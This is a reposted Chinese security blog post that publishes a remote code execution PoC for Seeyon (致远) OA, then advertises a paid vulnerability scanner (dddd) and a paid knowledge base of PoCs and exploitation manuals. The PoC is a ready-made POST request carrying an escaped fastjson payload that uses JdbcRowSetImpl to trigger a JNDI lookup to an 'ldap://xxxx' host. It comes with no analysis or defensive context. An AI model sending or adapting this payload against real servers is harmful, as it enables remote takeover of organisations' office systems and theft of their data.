2026-01-17 01:45:19 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文分享了致远OARCE漏洞POC，并推介了集成海量指纹与POC的dddd扫描工具。同时重点推广付费的安艺圈知识库，涵盖JAVA代码审计、SRC实战记录及漏洞利用手册等内容，旨在为攻防人员提供实战思路与资源支持。 综合评分： 55 文章分类： 软文广告,安全工具,漏洞POC,渗透测试,SRC活动

cover_image

致远OA rce

原创

安全艺术安全艺术

安全艺术

2026年1月16日 08:30 北京

POST/seeyon/sursenServlet HTTP/1.1

sursenData=%7B%22name%22%3A%7B%22%5Cu0040%5Cu0074%5Cu0079%5Cu0070%5Cu0065%22%3A%22%5Cu006a%5Cu0061%5Cu0076%5Cu0061%5Cu002e%5Cu006c%5Cu0061%5Cu006e%5Cu0067%5Cu002e%5Cu0043%5Cu006c%5Cu0061%5Cu0073%5Cu0073%22%2C%22%5Cu0076%5Cu0061%5Cu006c%22%3A%22%5Cu0063%5Cu006f%5Cu006d%5Cu002e%5Cu0073%5Cu0075%5Cu006e%5Cu002e%5Cu0072%5Cu006f%5Cu0077%5Cu0073%5Cu0065%5Cu0074%5Cu002e%5Cu004a%5Cu0064%5Cu0062%5Cu0063%5Cu0052%5Cu006f%5Cu0077%5Cu0053%5Cu0065%5Cu0074%5Cu0049%5Cu006d%5Cu0070%5Cu006c%22%7D%2C%22x%22%3A%7B%22%5Cu0040%5Cu0074%5Cu0079%5Cu0070%5Cu0065%22%3A%22%5Cu0063%5Cu006f%5Cu006d%5Cu002e%5Cu0073%5Cu0075%5Cu006e%5Cu002e%5Cu0072%5Cu006f%5Cu0077%5Cu0073%5Cu0065%5Cu0074%5Cu002e%5Cu004a%5Cu0064%5Cu0062%5Cu0063%5Cu0052%5Cu006f%5Cu0077%5Cu0053%5Cu0065%5Cu0074%5Cu0049%5Cu006d%5Cu0070%5Cu006c%22%2C%22%5Cu0064%5Cu0061%5Cu0074%5Cu0061%5Cu0053%5Cu006f%5Cu0075%5Cu0072%5Cu0063%5Cu0065%5Cu004e%5Cu0061%5Cu006d%5Cu0065":"ldap://xxxx","autoCommit":true}}

新圈子上线

https://www.yuque.com/carrypan-kpexq/secart/vkz04vw6fbatwgko?singleDoc# 《dddd和知识库》

圈主介绍：

多年攻防渗透和SRC挖掘经验，分享各种案例实战思路等，dddd优化来源于实战，多次护网中斩获上万分记录。

知识库所有内容全部由圈主独自维护，严禁用于任何未授权扫描测试哈。

1. dddd维护

选择这个工具的最重要的原因就是支持先识别指纹，然后根据指纹去扫描对应POC，扫描效率很高。

1.1. 指纹POC

集成指纹、POC和workflow和POC优化（纯体力活，误报太多，陆陆续续维护2年了），目前指纹数据: 11227 条，漏洞POC: 4700 条，workflow：3483条，目前应该是市面上集成力度最大的了。

1.2. 目录扫描

这块主要是针对SRC挖掘和HVV项目中碰到的比较多的需要路径信息的指纹进行补充的，新增了很多发现频率非常高的springboot相关的接口信息，并通过指纹信息精准匹配，基本扫到就可以进一步利用。

1.3. 指纹高亮

这是来自师傅们提的需求，网站指纹识别输出，原版是统一输出的，没有任何区别，改版后新增了重点指纹（SRC和HVV漏洞高爆发点）高亮显示。

1.4. 蜜罐排除

思路很简单，指纹识别超过10个默认是蜜罐，不进行任何扫描。

其它死锁等bug修复。

2. 知识库维护

2.1. JAVA代码审计

自费999元跟班上课学习记录从0到1完整版。

2.2. Nday漏洞POC

各种渠道收集整理的POC，公开的和非公开的等等。

2.3. dddd更新记录

2.4. SRC实战记录

个人SRC实战案例，案例来源猎聘、蔚来汽车、WPS、自如、龙湖、货拉拉、讯飞等SRC。

2.5. 漏洞利用手册

高频漏洞深入利用方式整理总结，附带工具和案例。

2.6. 实战技巧总结

SRC、CNVD和HVV快速挖洞思路整理，附带实战案例。

2.7. 工具插件字典

3. 加入安艺圈

3.1. 购买套餐

•套餐一：dddd激活码：一年200；

•套餐二：安艺圈知识库：一年318；

•套餐三：dddd激活码+安艺圈知识库：一年500。

3.2. 微信新用户

加好友备注dddd进交流群看公告购买。

（dddd每人限1个激活码，激活前请选好常用电脑）

知识库需要联系我进入内部群获取。

3.3. 纷传老用户

登录纷传小程序或者APP中，点击”设置”进入设置界面进行截图，将设置截图和dddd运行截图通过微信发给我获取激活码。（dddd每人限1个激活码，激活前请选好常用电脑）

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术安全艺术安全艺术《致远OA rce》